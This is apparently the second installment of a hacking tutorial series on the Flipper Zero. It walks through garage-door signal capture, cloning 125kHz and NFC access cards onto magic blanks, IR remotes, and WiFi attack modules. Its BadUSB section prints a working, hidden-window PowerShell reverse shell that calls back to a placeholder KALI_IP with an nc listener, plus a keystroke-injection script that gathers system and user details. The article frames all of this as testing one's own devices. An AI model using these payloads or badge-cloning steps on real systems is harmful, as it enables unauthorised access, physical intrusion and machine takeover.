Flipper Zero Mastery: Every Protocol, Every Trick

The Hacker's Path: A 5-Part Series

Part 1: Introduction → Part 2: Flipper Mastery → Part 3: Kali Fundamentals → Part 4: Exploitation → Part 5: The Full Audit

In Part 1, you got your feet wet. You cloned some IR remotes, scanned some NFC cards, watched the sub-GHz spectrum light up, and typed "Hello World" with BadUSB. You saw that security is often an illusion.

Now we go deep. By the end of this article, you'll understand every major protocol your Flipper Zero can interact with—not just how to use them, but why they work the way they do and what that means for security.

Fair warning: You're going to discover that several things you assumed were secure... aren't.

The Flipper Philosophy

Before we dive into protocols, let's establish the right mindset. The Flipper Zero is not a "hacking device" in the Hollywood sense. It's a learning tool that lets you interact with radio frequencies and hardware protocols that are normally invisible.

Think of it like a magnifying glass for wireless signals. The signals were always there. You just couldn't see them. Now you can.

This distinction matters because it changes how you approach security. Most "security" relies on obscurity—the assumption that attackers won't know how to interact with a system. Your Flipper removes that obscurity. It shows you exactly what's being transmitted and received. And once you can see it, you can evaluate whether actual security exists.

Spoiler: Often, it doesn't.

⚠️ Reminder: Your Stuff Only

Everything in this article is for testing YOUR OWN devices, cards, and systems. The techniques work on anyone's stuff—that's the point. But using them on systems you don't own is illegal. Test your own security. Discover your own vulnerabilities. That's the path.

Sub-GHz: The Invisible Spectrum

Sub-gigahertz radio frequencies are everywhere. Your garage door, car key fob, weather station, wireless doorbell, tire pressure sensors, smart home devices—they're all constantly transmitting in frequency bands below 1 GHz.

Why sub-GHz? Lower frequencies travel farther and penetrate walls better than higher frequencies like WiFi (2.4/5 GHz). That makes them perfect for devices that need reliable communication over distance without line-of-sight requirements.

The Frequency Landscape

Different regions use different frequencies due to regulations:

• 315 MHz: North America—older garage doors, car fobs
• 390 MHz: North America—garage doors, some automotive
• 433.92 MHz: Worldwide—weather stations, sensors, European devices, many IoT products
• 868 MHz: Europe—smart home, LoRa, utility meters
• 915 MHz: Americas—LoRa, smart home, industrial

With Momentum firmware, your Flipper can transmit and receive across all these bands regardless of your physical location. Stock firmware restricts you to your region's legal frequencies. This matters for learning—you might have devices operating on "foreign" frequencies.

Project: Analyze Your Garage Door

Time: 15 minutes

What you'll learn: The difference between static codes and rolling codes—and why it matters

Steps:

1. Navigate to Sub-GHz → Read
2. Stand near your garage (not so close that the door opens)
3. Press your garage door remote button
4. Watch the Flipper capture the signal
5. Examine what was captured—look at the protocol identified

What you might see:

• Princeton, Linear, Chamberlain (old): Static codes. The same code transmits every time. Vulnerable to replay attacks.
• KeeLoq, Security+ 2.0, Rolling Code: Rolling codes. Each transmission uses a different code from a synchronized sequence. Cannot be simply replayed.

The reality: If your garage door uses a static code (many installed before ~2015 do), anyone who captures that signal once can replay it forever. Your garage is secured by the assumption that no one is listening. That assumption just broke.

Rolling Codes Explained

Modern garage doors and car key fobs use rolling codes (also called hopping codes). Here's how they work:

1. Both the transmitter (your remote) and receiver (your garage) share a secret seed and algorithm
2. Each button press generates the next code in a synchronized sequence
3. The receiver accepts the current code OR any of the next ~256 codes (to handle button presses out of range)
4. Once a code is used, it's invalidated forever

This means capturing and replaying a rolling code signal doesn't work—by the time you replay it, the code is already invalidated.

Why This Matters

Rolling codes were invented because the sub-GHz world discovered that security through obscurity fails. Someone figured out how to capture and replay signals, so the industry had to implement actual cryptographic security. This pattern repeats across every protocol we'll discuss: security only gets added after someone demonstrates the vulnerability.

Project: Capture Weather Station Data

Time: 10 minutes

What you'll learn: How much data broadcasts without any protection

Steps:

1. Navigate to Sub-GHz → Read
2. Wait near any wireless weather sensor (outdoor thermometer, rain gauge, etc.)
3. Most transmit every 30-60 seconds
4. Capture the transmission
5. Note the protocol and any decoded data

What you'll find: Temperature, humidity, battery status, sensor ID—all transmitted in plaintext. No encryption, no authentication. Any receiver tuned to that frequency gets all the data. Now think about what else in your neighborhood is broadcasting...

RFID: The 125kHz World

Low-frequency RFID (125kHz) is the older, simpler proximity card technology. You'll find it in gym membership cards, older office building access cards, parking garages, and apartment building entry systems.

And it's almost universally terrible for security.

How 125kHz RFID Works

These cards are passive—they have no battery. When you hold one near a reader, the reader's electromagnetic field powers the card, and the card transmits its ID number. That's it. No challenge-response. No encryption. Just: "I am card number 12345."

The reader says "okay" and grants access based solely on knowing that ID number.

You see the problem.

Common 125kHz Card Types

• EM4100: Extremely common. Just broadcasts a 40-bit ID. Zero security.
• HID Prox: The most common corporate access card. Broadcasts facility code + card number. Zero security.
• Indala: Less common. Different encoding but same problem—no security.
• AWID: Another variant. Same fundamental weakness.

Notice the pattern? All of these cards simply broadcast an ID. The "security" is that someone would need specialized equipment to read that ID. Your Flipper is that equipment.

Project: Clone Your Gym Card

Time: 5 minutes

What you need: Your gym/pool/apartment 125kHz card, a T5577 blank card ($1-2 each)

Steps:

1. Navigate to 125 kHz RFID → Read
2. Hold your card against the Flipper's back (where the RFID antenna is)
3. Wait for successful read—note the card type and ID
4. Save the card with a recognizable name
5. To test emulation: Saved → Select Card → Emulate
6. Hold Flipper to your gym's reader—it should work identically to your card

To write to a blank T5577:

1. Go to your saved card
2. Select Write
3. Hold a T5577 blank card to the Flipper
4. Wait for write confirmation
5. You now have a physical clone

Why this matters: The entire security model of that access control system just collapsed. Anyone who can get close to your card for two seconds can clone it. Think about that the next time you leave your gym bag unattended in the locker room.

The T5577: Your Magic Card

The T5577 is a rewritable RFID card that can emulate most 125kHz card types. It's like a blank CD-R for access cards. You can write any card data to it, and it becomes that card.

Buy a pack of 10 for testing. They're cheap and incredibly useful for understanding how weak this entire technology is. You can write one card data, test it, then write different card data—all on the same physical card.

What This Reveals

125kHz RFID "security" is pure theater. These systems assume you can't read the card, can't copy the data, and can't write it to another card. All three assumptions are false with consumer equipment. If your workplace uses HID Prox cards (the most common corporate access card), any employee with a Flipper can clone any other employee's access. Let that sink in.

NFC: The 13.56MHz World

High-frequency NFC (13.56 MHz) is the newer generation. It powers contactless payment, modern access cards, transit systems, hotel keys, and your phone's tap-to-pay.

The good news: Some NFC cards actually have real security.

The bad news: Many don't.

NFC Card Types

• MIFARE Classic: Extremely common in access cards, transit, hotels. Uses proprietary encryption that was cracked years ago. Vulnerable.
• MIFARE Ultralight: Simple cards with minimal security. Often used for disposable transit tickets.
• NTAG: Common in NFC tags for automation. Usually minimal security.
• MIFARE DESFire: Actually secure. Uses AES encryption. Used in newer high-security deployments.
• EMV (Payment Cards): Your credit card. Has strong encryption, transaction limits, and fraud detection.

Project: Analyze Your Work Badge

Time: 10 minutes

What you'll learn: Whether your workplace has real security or security theater

Steps:

1. Navigate to NFC → Read
2. Hold your work badge against the Flipper's back
3. Wait for the read to complete
4. Examine what the Flipper tells you

Interpreting results:

• MIFARE Classic 1K/4K: Your badge uses cracked encryption. With time and the right tools, it can be cloned.
• MIFARE Ultralight: Minimal security. Often clonable.
• MIFARE DESFire: Actually secure. You'll see limited data.
• Unknown/Locked: Could be proprietary or could be DESFire. More investigation needed.

Reality check: Most corporate badges are still MIFARE Classic. The encryption was broken publicly in 2008. Eighteen years ago. If your badge says MIFARE Classic, your employer is running a security system that cryptographers consider laughably broken.

UID Cloning vs Full Cloning

Important distinction: The Flipper can always read and emulate a card's UID (Unique Identifier)—the serial number. Some access systems only check the UID. For these systems, simple emulation works.

Better systems check both the UID AND encrypted data stored on the card. For these, you'd need to also clone the encrypted sectors—possible for MIFARE Classic (the encryption is broken) but not for DESFire.

Project: Hotel Key Card Analysis

Time: 5 minutes (next time you're at a hotel)

What you'll learn: How hotel security actually works

Steps:

1. Read your hotel key card with NFC → Read
2. Note the card type
3. Look at what data is readable

What you'll typically find: Most hotel keys are MIFARE Ultralight or Classic. Some show room number, check-out date, or other metadata in readable sectors. The "security" is that guests don't usually have NFC readers. You do now.

Magic Cards for NFC

Like the T5577 for 125kHz, there are "magic" NFC cards for 13.56MHz:

• Gen1 (UID Changeable): Can write custom UID. Detected by some readers as "magic."
• Gen2 (CUID): Better compatibility. UID changes stick through power cycles.
• Gen3 (UFUID): Can lock UID after writing—appears as normal card.
• Gen4 (Ultimate Magic): Most flexible. Can emulate multiple card types.

For learning, Gen2 cards are the sweet spot—cheap, widely compatible, and good enough for most testing.

Infrared: Complete Control

You already created IR remotes in Part 1. Let's go deeper.

Building the Ultimate Remote Library

The Flipper can store unlimited IR remotes. But learning each button individually is tedious. Better approach: use the community databases.

Momentum firmware includes IRDB—a massive database of pre-captured remotes. You can also download remotes from GitHub repositories and add them to your Flipper's SD card.

Project: Build Your IR Arsenal

Time: 20 minutes

Steps:

1. On your Flipper: Infrared → Universal Remotes
2. You'll find pre-built universal remotes for TVs, ACs, projectors, etc.
3. Test these against your devices
4. For devices not covered, use Learn New Remote
5. Organize saved remotes by room or device type

Power move: Create "room remotes" that combine all IR devices in a single space. One file controls TV, soundbar, lights, and AC.

What you learn: IR is universal and unprotected. Any device with an IR receiver can be controlled by any device with an IR transmitter. This is intentional—IR was designed for convenience, not security. Your Flipper just makes that convenience universal.

Raw IR Capture

Some devices use non-standard IR protocols. For these, the Flipper can capture the raw signal—the exact timing of on/off pulses—and replay it perfectly.

Navigate to Infrared → Learn New → Raw when standard learning doesn't recognize a signal.

BadUSB: The Rubber Ducky Alternative

In Part 1, you made the Flipper type "Hello World." Now we get serious.

BadUSB (also known as USB Rubber Ducky attacks) exploits a fundamental flaw in how computers handle USB devices: they trust keyboards implicitly. When you plug in a device that claims to be a keyboard, the computer accepts every keystroke without question.

Your Flipper can type approximately 1,000 characters per second. Faster than any human. Fast enough to execute complex attacks before anyone can react.

DuckyScript Fundamentals

BadUSB payloads use DuckyScript, a simple scripting language. Key commands:

1REM This is a comment
2DELAY 1000
3STRING Hello World
4ENTER
5GUI r
6ALT F4
7CTRL c
8TAB
9DOWNARROW
10ESCAPE

Project: System Information Grabber

Time: 15 minutes

What it does: Opens PowerShell, gathers system info, saves to a file (on YOUR machine)

1REM System Info Grabber - Run on YOUR machine only
2DELAY 1000
3GUI r
4DELAY 500
5STRING powershell -WindowStyle Hidden
6ENTER
7DELAY 1000
8STRING $info = @{
9ENTER
10STRING Hostname = $env:COMPUTERNAME
11ENTER
12STRING Username = $env:USERNAME
13ENTER
14STRING Domain = $env:USERDOMAIN
15ENTER
16STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
17ENTER
18STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
19ENTER
20STRING }
21ENTER
22STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
23ENTER
24STRING exit
25ENTER

What you learn: In under 3 seconds of physical access, an attacker could gather hostname, username, domain, IP addresses, and OS version. This is reconnaissance. Imagine what else could be typed in those 3 seconds.

Project: Reverse Shell Setup

Time: 30 minutes (including Kali setup)

What it does: Creates a connection back to your Kali machine (prepares for Part 3)

Prerequisites: Kali Linux running (VM is fine), know your Kali IP address

On Kali - Start listener:

nc -lvnp 4444

BadUSB Payload (Windows target):

1REM Reverse Shell - Replace KALI_IP with your Kali's IP
2DELAY 1000
3GUI r
4DELAY 500
5STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
6ENTER

What happens: The target machine opens a PowerShell connection back to your Kali box. You now have command-line access to that machine. This is the core of how physical access + BadUSB = complete compromise. We'll explore this more in Part 3.

⚠️ These Payloads Are Real

The reverse shell payload above actually works. Use it ONLY on machines you own for testing. Running this on someone else's machine is a federal crime (unauthorized access + installation of backdoor). The point is to understand the threat, not to create one.

Fun Payloads for Demonstrations

For demonstrating BadUSB to others (on their machine with permission), here are some harmless but impressive payloads:

1REM Rick Roll - Opens YouTube
2DELAY 1000
3GUI r
4DELAY 500
5STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
6ENTER

1REM Fake Windows Update - Fullscreen prank page
2DELAY 1000
3GUI r
4DELAY 500
5STRING https://fakeupdate.net/win10ue/
6ENTER
7DELAY 2000
8F11

1REM Flip Screen Upside Down (Windows)
2DELAY 1000
3CTRL ALT DOWNARROW

GPIO: Hardware Expansion

The Flipper's GPIO (General Purpose Input/Output) pins let you connect external modules and expand capabilities. This is where the Flipper transforms from a handheld tool to a development platform.

Must-Have Modules

• WiFi Dev Board: Adds WiFi capabilities—packet capture, deauth testing, evil twin attacks. Essential for Part 3 onward.
• CC1101 External Antenna: Dramatically extends Sub-GHz range. The internal antenna works, but external is better for serious work.
• ESP32 Marauder: Turns Flipper into a WiFi/Bluetooth hacking platform. Captures handshakes, runs attacks.
• ProtoBoard: For custom projects and connecting your own hardware.

Project: WiFi Dev Board Setup

Time: 20 minutes

What you need: WiFi Dev Board (official or compatible ESP32)

Steps:

1. Flash Marauder firmware to ESP32 (instructions at github.com/justcallmekoko/ESP32Marauder)
2. Connect to Flipper's GPIO pins
3. Navigate to GPIO → ESP32 → Marauder
4. You now have WiFi scanning, deauth, and packet capture

Why this matters: The Flipper alone can't do WiFi—it lacks the right radio hardware. But with the dev board, you can scan networks, capture WPA handshakes, and perform WiFi attacks. We'll use this extensively in Parts 3 and 4.

Advanced Momentum Features

If you're running Momentum firmware (you should be), here are features worth exploring:

• Desktop Animations: Purely cosmetic, but fun. Check out community animation packs.
• Extended Protocols: Momentum adds support for protocols stock firmware doesn't include.
• Application Hub: Additional apps beyond stock—games, tools, specialized utilities.
• Custom Asset Packs: Change the entire look and feel.

The real value is in the unlocked frequencies and extended protocol support. Stock firmware is intentionally limited for legal/regulatory compliance. Momentum assumes you're an adult who understands the rules.

What You've Mastered

You now understand:

• Sub-GHz: How garage doors, car fobs, and sensors communicate—and why rolling codes matter
• 125kHz RFID: Why gym cards and old access badges are trivially clonable
• 13.56MHz NFC: The difference between broken encryption (MIFARE Classic) and real security (DESFire)
• Infrared: How to build a universal remote library and capture raw signals
• BadUSB: Why USB HID trust is a fundamental vulnerability—and how to exploit it
• GPIO: How to expand into WiFi, extended range, and custom hardware

Your Flipper is now a weapon. But it's a screwdriver compared to Kali Linux, which is an entire workshop. Time to boot up the real hacking environment.

The Hacker's Path

A 5-part series taking you from curious to capable.

Part 1: Introduction Part 2: Flipper Mastery ✓ Part 3: Kali Fundamentals Part 4: Exploitation Part 5: Full Audit

Part 2 Checklist

☐ Sub-GHz: Garage door analyzed, rolling vs static codes understood

☐ 125kHz RFID: Cards read, at least one clone tested

☐ NFC: Work badge analyzed, card type identified

☐ Infrared: Complete home remote library built

☐ BadUSB: System info payload tested, reverse shell understood

☐ GPIO: WiFi dev board ready for Part 3

☐ Magic Cards: T5577 and/or NFC magic cards acquired for testing

What's Next

In Part 3, we leave the Flipper's focused capabilities and enter the full penetration testing environment: Kali Linux.

You'll learn:

• Setting up your hacking laboratory (VM installation and configuration)
• Network reconnaissance with nmap—mapping every device on your network
• Wireless reconnaissance—capturing WiFi handshakes with aircrack-ng
• Web reconnaissance—discovering what your router exposes
• Connecting Flipper captures to Kali workflows

The Flipper showed you vulnerabilities exist. Kali helps you understand exactly how deep they go.

See you in Part 3.